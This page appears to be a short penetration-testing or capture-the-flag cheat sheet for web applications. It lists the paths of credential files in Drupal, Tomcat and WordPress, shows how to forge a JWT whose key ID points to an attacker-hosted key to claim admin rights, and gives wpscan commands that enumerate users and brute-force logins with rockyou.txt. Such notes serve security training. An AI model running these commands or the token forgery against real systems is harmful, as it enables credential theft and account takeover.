Powered by

# web

# drupal

# database credentials 

/var/www/html/sites/default/settings.php

# apache tomcat

# application credentials

can typically be found here /opt/tomcat/conf/tomcat-users.xsd

cat /opt/tomcat/conf/tomcat-users.xml | grep -i user

# JWT

reference: https://jwt.io

Header

Identifies which algorithm is used to generate the signature HS256. indicates that this token is signed using HMAC-SHA256. Typical cryptographic algorithms used are HMAC with SHA-256 (HS256) and RSA signature with SHA-256 (RS256).

{
  "alg": "HS256",
  "typ": "JWT"
}

Payload Contains a set of claims. The JWT specification defines seven Registered Claim Names which are the standard fields commonly included in tokens.

{
  "loggedInAs": "admin",
  "iat": 1422779638
}

Signature Securely validates the token. The signature is calculated by encoding the header and payload using Base64url Encoding RFC 4648 and concatenating the two together with a period separator. That string is then run through the cryptographic algorithm specified in the header, in this case HMAC-SHA256. The Base64url Encoding is similar to base64, but uses different non-alphanumeric characters and omits padding.

HMAC_SHA256(
  secret,
  base64urlEncoding(header) + '.' +
  base64urlEncoding(payload)
)

# Manipulating private keys: 

ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key

copy the following into https://jwt.io , base64 fields are separated by '.'

echo '{"typ":"JWT","alg":"RS256","kid":"http://10.10.10.5:7070/privKey.key"}' | base64
echo '{"username":"mike","email":"mike@rotch.com","admin_cap":true}' | base64

Copy your private generated key and paste it in the Private Key tab and copy the code formed on the left side

# Wordpress

# Enumerating users

Enumerate users

wpscan --url example.box -e ap         #enumerate plugins
wpscan --url example.box --enumerate u #enumerate users

# bruteforcing wp-admin login 

wpscan --url example.box --passwords /usr/share/wordlists/rockyou.txt --usernames admin,joe
wpscan --url example.box --passwords /usr/share/wordlists/rockyou.txt -U users.list
wpscan --url example.box --wp-content-dir wp-admin --usernames elliot --passwords ./fsoc.dic

# interesting files

/var/www/html/wordpress/wp-config.php

/etc/passwd

# finding joomla version 

http://www.example.com/administrator/manifests/files/joomla.xml

© Copyright 2021. All rights reserved.